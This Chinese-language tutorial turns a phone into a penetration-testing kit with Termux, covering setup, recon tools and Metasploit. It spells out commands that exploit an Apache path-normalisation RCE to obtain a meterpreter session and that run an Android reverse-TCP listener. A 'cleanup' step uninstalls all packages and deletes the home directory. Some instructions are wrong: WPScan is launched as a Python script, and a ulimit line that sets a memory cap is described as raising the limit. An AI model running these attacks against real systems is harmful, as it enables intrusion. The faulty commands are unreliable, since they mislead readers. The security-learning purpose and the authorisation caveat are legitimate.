Termux 移动渗透测试实战手册

1. Termux入门:你的口袋里的渗透测试实验室

第一次听说Termux时,我正坐在咖啡馆里用手机刷技术论坛。当时我就在想:要是能把Kali Linux装进手机该多酷?没想到Termux真的让这个想法成真了。它本质上是一个Android终端模拟器,但远不止于此——通过它你可以在手机上运行完整的Linux环境,安装各种安全工具,把普通手机变成移动渗透测试平台。

与传统的虚拟机方案相比,Termux有几个明显优势。首先是便携性,你随时可以从口袋里掏出手机开始工作;其次是资源占用低,我的旧手机跑Kali虚拟机卡得要命,但Termux运行流畅;最重要的是它支持apt包管理,这意味着你可以像在Ubuntu上一样轻松安装各种工具。

不过要提醒的是,Termux默认不带root权限。有些高级功能确实需要root,但大多数基础操作完全可以在非root环境下完成。我建议新手先从非root模式开始,等熟悉了再考虑root的事。毕竟安全研究最重要的是思路和技能,而不是工具本身有多强大。

2. 环境搭建:从零开始的Termux配置

2.1 基础环境准备

安装Termux的第一步就让我踩了个坑——从第三方网站下载的版本总是闪退。后来发现F-Droid上的官方版本最稳定。安装完成后,第一件事永远是更新软件源:

pkg update && pkg upgrade

这个命令会更新软件包列表并升级所有已安装的包。我建议每次打开Termux都先跑一遍这个命令,保持环境最新。

接下来是基础工具链的安装。这些工具在后续操作中会频繁用到:

pkg install git curl wget nano vim

如果你像我一样经常需要编辑配置文件,强烈建议安装nano或vim。Termux自带的文本编辑器功能有限,而这两个工具能让你在手机上也能高效编辑代码。

2.2 存储权限配置

Termux默认只能访问自己的安装目录,要访问手机存储需要额外配置:

termux-setup-storage

执行后会弹出权限请求,同意后Termux就能访问手机存储了。这时会在home目录下创建storage目录,里面包含各种存储链接:

  • storage/downloads → 下载目录
  • storage/dcim → 相册
  • storage/shared → 整个存储空间

这个功能特别实用,比如你可以把扫描报告直接保存到下载目录,方便用其他应用查看。

3. 渗透测试工具全家桶

3.1 信息收集工具

信息收集是渗透测试的第一步,Termux上可以安装各种强大的侦查工具。我最常用的是ReconDog,它是一个多功能的侦查工具包:

pkg install python2 git git clone https://github.com/UltimateHackers/ReconDog.git cd ReconDog chmod +x dog.py python2 dog.py

运行后会显示一个交互式菜单,提供Whois查询、DNS查询、子域名扫描等功能。实测下来,它的反向IP查询特别有用,能快速发现同一服务器上的其他网站。

另一个必备工具是RED_HAWK,专为网站侦查设计:

pkg install php git git clone https://github.com/Tuhinshubhra/RED_HAWK cd RED_HAWK php rhawk.php

它集成了CMS检测、敏感文件扫描、端口扫描等功能。我特别喜欢它的爬虫功能,能自动提取网站的所有链接和表单。

3.2 漏洞利用框架

Metasploit无疑是渗透测试的瑞士军刀。在Termux上安装它需要一些技巧:

pkg install unstable-repo pkg install metasploit cd $PREFIX/opt/metasploit-framework ./msfconsole

安装过程可能会比较慢,建议在WiFi环境下进行。第一次启动msfconsole时,它会初始化数据库,这可能需要几分钟。成功后你会看到标志性的msf>提示符。

一个小技巧:Termux上的Metasploit资源占用较大,长时间使用可能会导致手机发热。我通常会在不需要时用exit命令退出,或者直接关闭Termux会话。

4. 实战演练:从信息收集到漏洞利用

4.1 目标侦查案例

假设我们要测试一个网站的安全性,完整的侦查流程可能是这样的:

  1. 先用ReconDog进行基础信息收集:

    python2 dog.py

    选择"Website Recon"功能,输入目标域名,获取IP、DNS记录等信息。

  2. 使用RED_HAWK进行深度扫描:

    php rhawk.php

    重点关注它发现的敏感目录和文件,比如/admin、/backup等。

  3. 针对特定服务进行漏洞扫描。如果发现WordPress站点,可以用:

    pkg install python git clone https://github.com/wpscanteam/wpscan cd wpscan python wpscan.py --url 目标网站 --enumerate p

4.2 漏洞利用实例

发现目标运行着旧版Apache服务器后,我们可以尝试已知漏洞利用:

msfconsole use exploit/multi/http/apache_normalize_path_rce set RHOSTS 目标IP set RPORT 80 set TARGETURI / exploit

如果成功,我们会获得一个meterpreter会话。这时可以执行:

sysinfo getuid

获取系统信息。在Termux上操作meterpreter会话时,建议使用外接键盘,因为有些命令需要特殊按键组合。

5. 高级技巧与疑难排解

5.1 持久化与后台运行

Termux默认关闭后进程会被终止。要保持Metasploit监听会话,可以使用Termux的唤醒锁定和后台服务功能:

termux-wake-lock ./msfconsole -q -x "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set LPORT 4444; exploit"

这样即使切换到其他应用,监听会话也会保持活动状态。记得用完后再执行:

termux-wake-unlock

释放唤醒锁以节省电量。

5.2 常见问题解决

  1. 软件包安装失败:首先尝试更新软件源pkg update,如果还是失败,可以清除缓存:

    pkg clean

  2. 内存不足:Termux默认只使用有限的内存。对于内存密集型任务,可以尝试:

    ulimit -Sv 500000

    这会临时增加内存限制。

  3. 终端显示异常:有时滚动会出问题,可以安装Termux的官方插件Termux:Styling来调整字体和配色。

6. 合法合规与最佳实践

在移动设备上进行渗透测试虽然方便,但也要特别注意合法性。我始终坚持三个原则:

  1. 只测试自己拥有或获得明确书面授权的系统
  2. 不在公共WiFi上进行敏感操作
  3. 测试完成后立即删除所有敏感数据

Termux环境的清理也很重要:

pkg list-installed | cut -d/ -f1 | xargs pkg uninstall rm -rf ~/*

这会卸载所有软件包并清除用户数据。对于root过的设备,还需要检查/system分区是否被修改过。